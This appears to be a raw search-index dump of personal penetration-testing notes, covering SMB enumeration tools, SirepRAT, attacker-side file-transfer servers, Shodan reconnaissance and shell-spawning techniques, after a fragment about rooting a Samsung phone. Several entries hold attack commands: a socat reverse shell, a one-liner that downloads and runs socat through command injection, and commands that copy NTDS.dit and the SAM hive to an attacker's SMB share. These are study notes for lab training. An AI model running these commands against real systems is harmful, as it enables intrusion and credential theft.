                        When the screen turns into black, remove the pressing only from the Volume Down until the logo of Samsung appears. From that point we need to count to three and then remove the pressing only from the Power button and keep pressing Volume Up.

                        ...

                        Troubleshooting: Aparently, I did not do it correctly and got stuck in the situation in which, my phone was is download mode displaying RMM/KG State: Prenormal. So my phone had no OEM unlocking enable option and could not be rooted. The solution: https://www.youtube.com/watch?v=TBUY05mnCP8

                        After that I did not know if I had to go back to the flash step or Iif I should try to get to the download mode and then try to get into the recovery mode. I went through a loop of turning on and off, with several reinstallations and frozen screens with Samsung logo in it. I saw the \"erasing\" mesage several times and...

                        Odin3 v3.14.4 : https://dl2018.sammobile.com/Odin.zipDriver

                        de Samsung : https://developer.samsung.com/android-usb-driver

                        TWRP : https://forum.xda-developers.com/t/recovery-unofficial-teamwin-recovery-project-v3-6-2-android-11-12.4400869/Magisk : https://github.com/topjohnwu/Magisk

                        MultiDisabler : https://forum.xda-developers.com/t/pie-10-11-system-as-root-multidisabler-disables-encryption-vaultkeeper-auto-flash-of-stock-recovery-proca-wsm-cass-etc.3919714/

                        Samsung health Samsung Gear Samsung Safe folder -enable

                        Rooting a device will allow us to:

                        • install custom rom based on One UI, pure android and ROM gsi and android generic images
                        • modify in device app that requires root access

                        Also we will loose some Samsung features. Samsung ... path Samsung health Samsung Gear Samsung Safe folder Guarantee

                        But some of these features (Samsung health, Samsung Gear, Samsung Safe) x1may be recovered with a custom ROM

                        How to enable USB in virtualbox: https://www.techrepublic.com/article/how-to-enable-usb-in-virtualbox/

                        "},{"location":"rpcclient/","title":"rpcclient - A tool for interacting with smb shares","text":"

                        This is a tool to perform MS-RPC functions.

                        The Remote Procedure Call (RPC) is a central tool to realize operational and work-sharing structures in networks and client-server architectures.

                        Remote Procedure Call (RPC) is a powerful technique for constructing distributed, client-server based applications. It is based on extending the conventional local procedure calling so that the called procedure need not exist in the same address space as the calling procedure. The two processes may be on the same system, or they may be on different systems with a network connecting them.

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"rpcclient/#basic-usage","title":"Basic usage","text":"
                        # Connect to a remote shared folder (same as smbclient in this regard)\nrpcclient -U \"\" 10.129.14.128\n\n# Server information\nsrvinfo\n\n# Enumerate all domains that are deployed in the network \nenumdomains\n\n# Provides domain, server, and user information of deployed domains.\nquerydominfo\n\n# Enumerates all available shares.\nnetshareenumall\n\n# Provides information about a specific share.\nnetsharegetinfo <share>\n\n# Enumerates all domain users.\nenumdomusers\n\n# Provides information about a specific user.\nqueryuser <RID>\n    # An example:\n    # rpcclient $> queryuser 0x3e8\n\n# Provides information about a specific group.\nquerygroup <ID>\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"rpcclient/#brute-forcing-user-enumeration-with-rpcclient","title":"Brute forcing user enumeration with rpcclient","text":"
                        for i in $(seq 500 1100);do rpcclient -N -U \"\" $ip -c \"queryuser 0x$(printf '%x\\n' $i)\" | grep \"User Name\\|user_rid\\|group_rid\" && echo \"\";done\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"rsat-remote-server-administration-tools/","title":"Remote Server Administration Tools (RSAT)","text":"

                        The Remote Server Administration Tools (RSAT) have been part of Windows since the days of Windows 2000. RSAT allows systems administrators to remotely manage Windows Server roles and features from a workstation running Windows 10, Windows 8.1, Windows 7, or Windows Vista. RSAT can only be installed on Professional or Enterprise editions of Windows.

                        • Script to install RSAT on Windows 10 1809, 1903, and 1909.
                        • Other versions of Windows and more documentation.
                        # Check if RSAT tools are installed\nGet-WindowsCapability -Name RSAT* -Online \\| Select-Object -Property Name, State\n\n# Install all RSAT tools\nGet-WindowsCapability -Name RSAT* -Online \\| Add-WindowsCapability \u2013Online\n\n# Install a specific RSAT tool, for instance Rsat.ActiveDirectory.DS-LDS.Tools \nAdd-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0  \u2013Online\n

                        Once installed, all of the tools will be available under: Control Panel> All Control Panel Items >Administrative Tools.

                        ","tags":["tools"]},{"location":"rules-of-engagement-checklist/","title":"Rules of Engagement - Checklist","text":"Checkpoint Contents \u2610 Introduction Description of this document. \u2610 Contractor Company name, contractor full name, job title. \u2610 Penetration Testers Company name, pentesters full name. \u2610 Contact Information Mailing addresses, e-mail addresses, and phone numbers of all client parties and penetration testers. \u2610 Purpose Description of the purpose for the conducted penetration test. \u2610 Goals Description of the goals that should be achieved with the penetration test. \u2610 Scope All IPs, domain names, URLs, or CIDR ranges. \u2610 Lines of Communication Online conferences or phone calls or face-to-face meetings, or via e-mail. \u2610 Time Estimation Start and end dates. \u2610 Time of the Day to Test Times of the day to test. \u2610 Penetration Testing Type External/Internal Penetration Test/Vulnerability Assessments/Social Engineering. \u2610 Penetration Testing Locations Description of how the connection to the client network is established. \u2610 Methodologies OSSTMM, PTES, OWASP, and others. \u2610 Objectives / Flags Users, specific files, specific information, and others. \u2610 Evidence Handling Encryption, secure protocols \u2610 System Backups Configuration files, databases, and others. \u2610 Information Handling Strong data encryption \u2610 Incident Handling and Reporting Cases for contact, pentest interruptions, type of reports \u2610 Status Meetings Frequency of meetings, dates, times, included parties \u2610 Reporting Type, target readers, focus \u2610 Retesting Start and end dates \u2610 Disclaimers and Limitation of Liability System damage, data loss \u2610 Permission to Test Signed contract, contractors agreement","tags":["information-gathering","rules of engagement","cpts"]},{"location":"samba-suite/","title":"Samba Suite","text":"

                        It\u2019s used to enumerate info. It might be used in a Null session attack.

                        ","tags":["pentesting"]},{"location":"samba-suite/#installation","title":"Installation","text":"

                        Download it from: https://www.samba.org/

                        ","tags":["pentesting"]},{"location":"samba-suite/#basic-commands","title":"Basic commands","text":"
                        1. Enumerate File Server services:
                        nmblookup -A $ip\n
                        1. Also with the smbclient we can enumerate the shares provides by a host:
                        smbclient -L //$ip -N\n\n# -L\u00a0 Look at what services are available on a target\n# $ip\u00a0Prepend the two slahes\n# -N \u00a0Force the tool not to ask for a password\n
                        1. Connect:
                        smbclient \\\\$ip\\sharedfolder -N\n

                        Be careful, sometimes the shell removes the slashes and you need to escape them.

                        1. Once connected you can browse with the smb command line. To see allowed commands: help
                        2. When you know the path of a file and you want to retrieve it:
                          • from kali:
                            smbget smb://$ip/SharedFolder/flag_1.txt\n
                          • from smb command line:
                            get flag_1.txt\n
                        ","tags":["pentesting"]},{"location":"samrdump/","title":"SAMRDump","text":"

                        Impacket\u2019s samrdump.py communicates with the Security Account Manager Remote (SAMR) interface to list system user accounts, available resource shares, and other sensitive information.

                        ","tags":["pentesting windows"]},{"location":"samrdump/#basic-commands","title":"Basic commands","text":"
                        # path: /usr/share/doc/python3-impacket/examples/samrdump.py\npython3 samrdump.py $ip\n
                        ","tags":["pentesting windows"]},{"location":"scrcpy/","title":"scrcpy","text":"","tags":["mobile pentesting","android"]},{"location":"scrcpy/#installation","title":"Installation","text":"

                        Download from: https://github.com/Genymobile/scrcpy.

                        ","tags":["mobile pentesting","android"]},{"location":"scrcpy/#on-linux","title":"On Linux","text":"

                        Source: https://github.com/Genymobile/scrcpy/blob/master/doc/linux.md

                        First, you need to install the required packages:

                        # for Debian/Ubuntu\nsudo apt install ffmpeg libsdl2-2.0-0 adb wget \\\n                 gcc git pkg-config meson ninja-build libsdl2-dev \\\n                 libavcodec-dev libavdevice-dev libavformat-dev libavutil-dev \\\n                 libswresample-dev libusb-1.0-0 libusb-1.0-0-dev\n

                        Then clone the repo and execute the installation script (source):

                        git clone https://github.com/Genymobile/scrcpy\ncd scrcpy\n./install_release.sh\n

                        When a new release is out, update the repo and reinstall:

                        git pull\n./install_release.sh\n

                        To uninstall:

                        sudo ninja -Cbuild-auto uninstall\n

                        Note that this simplified process only works for released versions (it downloads a prebuilt server binary), so for example you can't use it for testing the development branch (dev).

                        ","tags":["mobile pentesting","android"]},{"location":"scrcpy/#basic-usage","title":"Basic usage","text":"
                        scrcpy\n
                        ","tags":["mobile pentesting","android"]},{"location":"scrcpy/#debugging","title":"Debugging","text":"

                        For scrcpy to work, there must be an adb connection, which requires:

                        • Having developer mode enabled.
                        • Having USB debug mode enabled.

                        And there\u2019s an extra security restriction on Xiaomi Miui devices, which prevents USB debugging assigning permissions by default:

                        USB debugging (Security settings) Allow granting permissions and simulating input via USB debugging

                        This may require to sign in into a Xiaomi account (or sign up if you have no account.)

                        Otherwise you will obtain messages such as

                        ","tags":["mobile pentesting","android"]},{"location":"searchsploit/","title":"searchsploit","text":"

                        The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers.

                        ","tags":["pentesting","web pentesting","exploitation"]},{"location":"searchsploit/#installation","title":"Installation","text":"

                        Pre-installed in kali. Download it from: https://gitlab.com/exploit-database/exploitdb Also:

                        sudo apt install exploitdb -y\n
                        ","tags":["pentesting","web pentesting","exploitation"]},{"location":"searchsploit/#basic-usage","title":"Basic usage","text":"
                        searchsploit <WhatYouAreLookingFor>\n

                        Example:

                        If you want to have a look at those POCs, append the path provided to the root location for the searchsploit database (/usr/share/exploitdb/exploits).

                        ","tags":["pentesting","web pentesting","exploitation"]},{"location":"seatbelt/","title":"Seatbelt","text":"

                        Seatbelt is a C# project that performs a number of security oriented host-survey \"safety checks\" relevant from both offensive and defensive security perspectives.

                        ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"seatbelt/#installation","title":"Installation","text":"

                        Github repo: https://github.com/GhostPack/Seatbelt.

                        ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"servers/","title":"Setting up a server (in the attacking machine)","text":"Protocol / app smb server Apache server ngix symple python server php web server Ruby web server Burp Suite Collaborator Interactsh responder","tags":["servers","file transfer"]},{"location":"servers/#smb-server","title":"smb server","text":"

                        Launch smbserver in our attacker machine:

                        sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/\n

                        Now, from PS in the victim's windows machine we could upload a folder to the shared folder in the attacker machine just by running:

                        cmd.exe /c move C:\\NTDS\\NTDS.dit \\\\$ip\\CompData\n
                        ","tags":["servers","file transfer"]},{"location":"servers/#apache-server","title":"Apache server","text":"

                        Once you have a folder structure such as \"/var/www/\" or \"/var/www/html\", and also an Apache server installed, you can serve all files from that path by initiating the service:

                        # Start Apache\nservice apache2 start\n\n# Stop Apache\nservice apache2 stop\n\n# Restart Apache\nservice apache2 restart\n\n# See status of Apache server\nservice apache2 status\n

                        In Apache, the PHP module loves to execute anything ending in PHP. Also, by default, with Apache, if we hit a directory without an index file (index.html), it will list all the files.

                        ","tags":["servers","file transfer"]},{"location":"servers/#nginx","title":"Nginx","text":"

                        In Apache, the PHP module loves to execute anything ending in PHP. This is not very safe when allowing HTTP uploads, as we are trying to avoid that users cannot upload web shells and execute them.

                        # Create a Directory to Handle Uploaded Files\nsudo mkdir -p /var/www/uploads/SecretUploadDirectory\n\n# Change the Owner to www-data\nsudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory\n\n# Create Nginx Configuration File by creating the file /etc/nginx/sites-available/upload.conf with the contents:\nserver {\n    listen 9001;\n\n    location /SecretUploadDirectory/ {\n        root    /var/www/uploads;\n        dav_methods PUT;\n    }\n}\n\n# Symlink our Site to the sites-enabled Directory\nsudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/\n\n# Start Nginx\nsudo systemctl restart nginx.service\n\n# If we get any error messages, check /var/log/nginx/error.log. we might see, for instance, port 80 is already in use.\n

                        Debuggin nginx:

                        First check: ensure the directory listing is not enabled by navigating to http://localhost/SecretUploadDirectory

                        Second check: Is default port in nginx already in use?

                        # Verifying Errors\ntail -2 `/var/log/nginx/error.log`\n# and we might check that port 80 could not be binded because is already in use\n\n# See which service is using port 80\nss -lnpt | grep `80`\n# we will obtain the service and also the pid. For instance `2811`\n\n# Check pid, for instance pid 2811, and see who is running it\nps -ef | grep \"2811\"\n\n# Remove NginxDefault Configuration to get around this, we can remove the default Nginx configuration, which binds on port 80.\nsudo rm /etc/nginx/sites-enabled/default\n

                        Finally you can copy to your nging server all files you want to transfer with curl:

                        curl -T file.txt\n# -T, --upload-file <file>; This transfers the specified local file to the remote URL. -T uses PUT http method\n
                        ","tags":["servers","file transfer"]},{"location":"servers/#simple-python-server","title":"Simple python server","text":"
                        # Creating a Web Server with Python3\ncd /tmp\npython3 -m http.server 8000\n\n# Creating a Web Server with Python2.7\npython2.7 -m SimpleHTTPServer\n
                        ","tags":["servers","file transfer"]},{"location":"servers/#php-web-server","title":"PHP web server","text":"
                        php -S 0.0.0.0:8000\n
                        ","tags":["servers","file transfer"]},{"location":"servers/#ruby-web-server","title":"Ruby Web Server","text":"
                        ruby -run -ehttpd . -p8000\n
                        ","tags":["servers","file transfer"]},{"location":"setting-up-mobile-penstesting/","title":"Setting up the mobile pentesting environment","text":"

                        Instructions

                        1. Start by installing drozer.
                        2. Install frida and, also, Burp certificate in frida.
                        3. Install apktool.
                        4. Install Objection.

                        Nice-to-have tools

                        1. Mobile Security Framework: MobSF.
                        2. mobsfscan.

                        ADB (Android Debug Bridge) cheat sheet.

                        ","tags":["mobile pentesting"]},{"location":"setting-up-mobile-penstesting/#resources","title":"Resources","text":"

                        https://medium.com/@lightbulbr/how-to-root-an-android-emulator-with-tiramisu-android-13-f070a756c499

                        Install Java JDK: https://wiki.centos.org/HowTos(2f)JavaDevelopmentKit.html

                        ","tags":["mobile pentesting"]},{"location":"sharpview/","title":"SharpView","text":"

                        (C#) - Doesn't support filtering using Pipeline\u00a0

                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"sharpview/#installation","title":"Installation","text":"

                        .NET port of\u00a0PowerView

                        Download github repo from: https://github.com/tevora-threat/SharpView/.

                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"shodan/","title":"shodan","text":"

                        Shodan can be used to find devices and systems permanently connected to the Internet like Internet of Things (IoT). It searches the Internet for open TCP/IP ports and filters the systems according to specific terms and criteria. For example, open HTTP or HTTPS ports and other server ports for FTP, SSH, SNMP, Telnet, RTSP, or SIP are searched. As a result, we can find devices and systems, such as surveillance cameras, servers, smart home systems, industrial controllers, traffic lights and traffic controllers, and various network components.

                        "},{"location":"shodan/#search-parameters","title":"Search parameters","text":"
                        country:\ncity:\ngeo:\nhostname:\nnet:\nos:\nport:\nbefore: / after:\n
                        "},{"location":"shodan/#example-shodan-for-enumeration","title":"Example: shodan for enumeration","text":"

                        Content from Pentesting notes:

                        crt.sh: it enables the verification of issued digital certificates for encrypted Internet connections. This is intended to enable the detection of false or maliciously issued certificates for a domain.

                        # Get all subdomais with that digital certificate\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq .\n\n# Filter all by unique subdomain\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq . | grep name | cut -d\":\" -f2 | grep -v \"CN=\" | cut -d'\"' -f2 | awk '{gsub(/\\\\n/,\"\\n\");}1;' | sort -u\n\n# With the list of unique subdomains, list all the Company hosted servers\nfor i in $(cat subdomainlist);do host $i | grep \"has address\" | grep example.com | cut -d\" \" -f4 >> ip-addresses.txt;done\n

                        Shodan: Once we see which hosts can be investigated further, we can generate a list of IP addresses with a minor adjustment to the cut command and run them through Shodan.

                        for i in $(cat ip-addresses.txt);do shodan host $i;done\n

                        Go to Pentesting notes to pursuit DNS enumeration.

                        "},{"location":"sireprat/","title":"SirepRAT - RCE as SYSTEM on Windows IoT Core","text":"

                        SirepRAT\u00a0Features full RAT capabilities without the need of writing a real RAT malware on target.

                        https://github.com/SafeBreach-Labs/SirepRAT#context)

                        ","tags":["windows","rce"]},{"location":"sireprat/#installation","title":"Installation","text":"
                        # Download the repository\ngit clone https://github.com/SafeBreach-Labs/SirepRAT.git\n\n# Run the installation\npip install -r requirements.txt\n
                        ","tags":["windows","rce"]},{"location":"sireprat/#basic-usage","title":"Basic usage","text":"","tags":["windows","rce"]},{"location":"sireprat/#usage","title":"Usage","text":"
                        # Download File bash\npython SirepRAT.py $ip GetFileFromDevice --remote_path \"C:\\Windows\\System32\\drivers\\etc\\hosts\" --v\n\n# Upload File\npython SirepRAT.py $ip PutFileOnDevice --remote_path \"C:\\Windows\\System32\\uploaded.txt\" --data \"Hello IoT world!\"\n\n# Run Arbitrary Program\npython SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\hostname.exe\"\n\n# With arguments, impersonated as the currently logged on user:\npython SirepRAT.py $ip LaunchCommandWithOutput --return_output --as_logged_on_user --cmd \"C:\\Windows\\System32\\cmd.exe\" --args \" /c echo {{userprofile}}\"\n\n# Try to run it without the\u00a0as_logged_on_user\u00a0flag to demonstrate the SYSTEM execution capability)\n# Get System Information\npython SirepRAT.py $ip GetSystemInformationFromDevice\n
                        ","tags":["windows","rce"]},{"location":"sireprat/#get-file-information","title":"Get File Information","text":"
                        python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path \"C:\\Windows\\System32\\ntoskrnl.exe\"\n
                        ","tags":["windows","rce"]},{"location":"sireprat/#see-help-for-full-details","title":"See help for full details:","text":"
                        python SirepRAT.py --help\n
                        ","tags":["windows","rce"]},{"location":"sireprat/#author","title":"Author","text":"","tags":["windows","rce"]},{"location":"sireprat/#related-labs","title":"Related Labs","text":"","tags":["windows","rce"]},{"location":"smbclient/","title":"smbclient - A tool for interacting with smb shares","text":"

                        See Quick Cheat sheet for smbclient.

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#smbclient-installation","title":"smbclient installation","text":"
                        sudo apt-get install smbclient\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#smbclient-configuration","title":"smbclient configuration","text":"

                        Default settings are in /etc/samba/smb.conf.

                         cat /etc/samba/smb.conf | grep -v \"#\\|\\;\" \n
                        Setting Description [sharename] The name of the network share. workgroup = WORKGROUP/DOMAIN Workgroup that will appear when clients query. path = /path/here/ The directory to which user is to be given access. server string = STRING The string that will show up when a connection is initiated. unix password sync = yes Synchronize the UNIX password with the SMB password? usershare allow guests = yes Allow non-authenticated users to access defined shared? map to guest = bad user What to do when a user login request doesn't match a valid UNIX user? browseable = yes Should this share be shown in the list of available shares? guest ok = yes Allow connecting to the service without using a password? read only = yes Allow users to read files only? create mask = 0700 What permissions need to be set for newly created files?

                        For pentesting notes on ports 137, 138, 139 and 445 with a smb service, see 137-138-139-445-smb.

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#smbclient-connection","title":"smbclient connection","text":"

                        See

                        # [-L|--list=HOST] : Selecting the targeted host for the connection request.\nsmbclient -L -N //$ip\n# -N: Suppresses the password prompt.\n# -L: retrieve a list of available shares on the remote host\n

                        Smbclient will attempt to connect to the remote host and check if there is any authentication required. If there is, it will ask you for a user and a password for your local username. If we do not specify a specific username to smbclient when attempting to connect to the remote host, it will just use your local machine's username.If vulnerable and performing a Null Attack, we will hit Enter when prompted for a password.

                        After authenticating, we may obtain access to some typical shared folders, such as:

                        ADMIN$ - Administrative shares are hidden network shares created by the Windows NT family of operating systems that allow system administrators to have remote access to every disk volume on a network-connected system. These shares may not be permanently deleted but may be disabled.\n\nC$ - Administrative share for the C:\\ disk volume. This is where the operating system is hosted.\n\nIPC$ - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.\nWorkShares - Custom share. \n

                        We will try to connect to each of the shares except for the IPC$ one, which is not valuable for us since it is not browsable as any regular directory would be and does not contain any files that we could use at this stage of our learning experience:

                        # the use of / and \\ might be different if you need to escape some characters\nsmbclient \\\\\\\\$ip\\\\ADMIN$\n

                        Important: Sometimes some jugling is needed:

                        smbclient -N -L \\\\$ip\nsmbclient -N -L \\\\\\\\$ip\nsmbclient -N -L /\\/\\$ip\n

                        If we have NT_STATUS_ACCESS_DENIED as output, we do not have the proper credentials to connect to this share.

                        Connect to a Shared folders as Administrator:

                        smbclient -L 10.129.228.98 -U Administrator\n

                        Also we can use rpcclient tool for connecting to the shared folders.

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#basic-commands-in-smbclient","title":"Basic commands in SMBclient","text":"
                        # Show available commands\nhelp\n\n# Download a file\nget <file>\n\n# See status\nsmbstatus\n\n# Smbclient also allows us to execute local system commands using an exclamation mark at the beginning (`!<cmd>`) without interrupting the connection.\n!cmd\n\n!cat prep-prod.txt\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#quick-cheat-sheet","title":"Quick cheat sheet","text":"
                        # List shares on a machine using NULL Session\nsmbclient -L <target-IP>\n\n# List shares on a machine using a valid username + password\nsmbclient -L \\<target-IP\\> -U username%password\n\n# Connect to a valid share with username + password\nsmbclient //\\<target\\>/\\<share$\\> -U username%password\n\n# List files on a specific share\nsmbclient //\\<target\\>/\\<share$\\> -c 'ls' password -U username\n\n# List files on a specific share folder inside the share\nsmbclient //\\<target\\>/\\<share$\\> -c 'cd folder; ls' password -U username\n\n# Download a file from a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'cd folder;get desired_file_name' password -U username\n\n# Copy a file to a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'put /var/www/my_local_file.txt .\\target_folder\\target_file.txt' password -U username\n\n# Create a folder in a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'mkdir .\\target_folder\\new_folder' password -U username\n\n# Rename a file in a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'rename current_file.txt new_file.txt' password -U username\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbmap/","title":"SMBMap","text":"

                        SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands.

                        ","tags":["smb","pass-the-hash","file upload","rce","tools"]},{"location":"smbmap/#installation","title":"Installation","text":"

                        Installation from https://github.com/ShawnDEvans/smbmap

                        sudo pip3 install smbmap\nsmbmap\n
                        ","tags":["smb","pass-the-hash","file upload","rce","tools"]},{"location":"smbmap/#basic-usage","title":"Basic usage","text":"
                        # Enumerate network shares and access associated permissions.\nsmbmap -H $ip\n\n# # Enumerate network shares and access associated permissions with recursivity\nsmbmap -H $ip -r\n\n# Download a file from a specific share folder\nsmbmap -H $ip --download \"folder\\file.txt\"\n\n# Upload a file to a specific share folder\nsmbmap -H $ip --upload originfile.txt \"targetfolder\\file.txt\"\n
                        ","tags":["smb","pass-the-hash","file upload","rce","tools"]},{"location":"smbserver/","title":"smbserver - from impacket","text":"

                        Simple SMB Server example. See impacket.

                        ","tags":["pentesting windows","server","impacket"]},{"location":"smbserver/#installation","title":"Installation","text":"

                        Download from: https://github.com/fortra/impacket/blob/master/examples/smbserver.py

                        ","tags":["pentesting windows","server","impacket"]},{"location":"smbserver/#basic-usage","title":"Basic usage","text":"","tags":["pentesting windows","server","impacket"]},{"location":"smbserver/#create-a-share-server-in-attacker-machine-and-connect-from-victims","title":"Create a share server in attacker machine and connect from victim's","text":"

                        Launch smbserver in our attacker machine:

                        sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/\n

                        Also you can launch it with username and password:

                        sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/ -username \"username\" -password \"agreatpassword\"\n

                        Now, from PS in the victim's windows machine we could upload a folder to the shared folder in the attacker machine just by running:

                        cmd.exe /c move C:\\NTDS\\NTDS.dit \\\\$ip\\CompData\n

                        Sidenote: see the HackTheBox machine Omni, which uses SirepRAT to upload files to the share. A taste of it:

                        # First crate the shared. After that, establish the connection:\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c net use \\\\10.10.14.2\\CompData /u:username agreatpassword'\n\n# Now copy files to the share. In this case we are dumping Hives \npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\cmd.exe\" --args ' /c reg save HKLM\\sam \\\n\\10.10.14.2\\CompData\\sam'\n
                        ","tags":["pentesting windows","server","impacket"]},{"location":"snmpwalk/","title":"snmpwalk - SNMP scanner","text":"

                        See SNMP for details about the protocol.

                        Snmpwalk is used to query the OIDs with their information. It retrieves a subtree of management values using SNMP GETNEXT requests.

                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"snmpwalk/#installation","title":"Installation","text":"
                        sudo apt-get install snmp\n
                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"snmpwalk/#basic-usage","title":"Basic usage","text":"
                        snmpwalk -v2c -c public $ip\n
                        snmpwalk -v 2c -c public $ip 1.3.6.1.2.1.1.5.0\n
                        snmpwalk -v 2c -c private $ip\n

                        If we do not know the community string, we can use onesixtyone and SecLists wordlists to identify these community strings.

                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"spawn-a-shell/","title":"Spawn a shell","text":"All about shells Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shell \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a\u00a0PHP\u00a0script to run a single command.

                        Webshell is a script written in a language that is executed by a server. Web shell are not fully interactive.

                        Resources for upgrading simple shells
                        • https://sushant747.gitbooks.io/total-oscp-guide/content/spawning_shells.html.
                        • Cheat sheet.
                        • Shell creation.
                        • About webshells.

                        Sidenote: Also, you can generate a webshell by using\u00a0 msfvenom

                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#clasification-of-shells","title":"Clasification of shells","text":"

                        On a Linux system, the shell is a program that takes input from the user via the keyboard and passes these commands to the operating system to perform a specific function.

                        There are three main types of shell connections:

                        Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shells \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shells Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command.","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#spawn-a-shell_1","title":"Spawn a shell","text":"","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#bash","title":"bash","text":"
                        # Upgrade shell with running these commands all at once:\n\nSHELL=/bin/bash script -q /dev/null\nCtrl-Z\nstty raw -echo\nfg\nreset\nxterm\n
                        bash -i\n\n# Using echo\necho 'os.system('/bin/bash')'\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#python","title":"python","text":"
                         # using python for a pseudo terminal\npython -c 'import os; os.system(\"/bin/sh\")'\n
                         # using python for a pseudo terminal\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\n\npython3 -c \"import pty;pty.spawn('/bin/bash')\"\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#ssh","title":"ssh","text":"
                        /bin/sh -i\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#perl","title":"perl","text":"
                        perl -e 'exec \"/bin/sh\";'\n\nperl:\u00a0 exec \"/bin/sh\";\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#ruby","title":"ruby","text":"
                        ruby:\u00a0 exec \"/bin/sh\";\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#lua","title":"lua","text":"
                        lua: os.execute(\u2018/bin/sh\u2019)\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#socat","title":"socat","text":"
                        # Listener:\nsocat file:`tty`,raw,echo=0 tcp-listen:4444\n\n#Victim:\nsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444\n

                        If socat isn\u2019t installed, there exists other options. There are standalone binaries that can be downloaded from this Github repo: https://github.com/andrew-d/static-binaries

                        With a command injection vuln, it\u2019s possible to download the correct architecture socat binary to a writable directoy, chmod it, then execute a reverse shell in one line:

                        wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444\n

                        On Kali, run:

                        socat file:`tty`,raw,echo=0 tcp-listen:4444\n

                        and you\u2019ll catch a fully interactive TTY session. It supports tab-completion, SIGINT/SIGSTP support, vim, up arrow history, etc. It\u2019s a full terminal.

                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#stty-options","title":"stty options","text":"
                        # In reverse shell\n$ python -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n# Ctrl-Z\n\n\n# In Kali\n$ stty raw -echo\n$ fg\n
                        # In reverse shell\nreset\nexport SHELL=bash\nexport TERM=xterm-256color\nstty size\nstty rows <num> columns <cols>\n\n# In one line:\nreset; export SHELL=bash; export TERM=xterm-256color; stty rows <num> columns <cols>\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#msfvenom","title":"msfvenom","text":"

                        You can generate a webshell by using\u00a0 msfvenom

                        # List payloads\nmsfvenom --list payloads | grep x64 | grep linux | grep reverse\u00a0\u00a0\n

                        Also msfvenom can use metasploit payloads under \u201ccmd/unix\u201d to generate one-liner bind or reverse shells. List options with:

                        msfvenom -l payloads | grep \"cmd/unix\" | awk '{print $1}'\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#awk","title":"awk","text":"
                        awk 'BEGIN {system(\"/bin/sh\")}'\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#find","title":"find","text":"
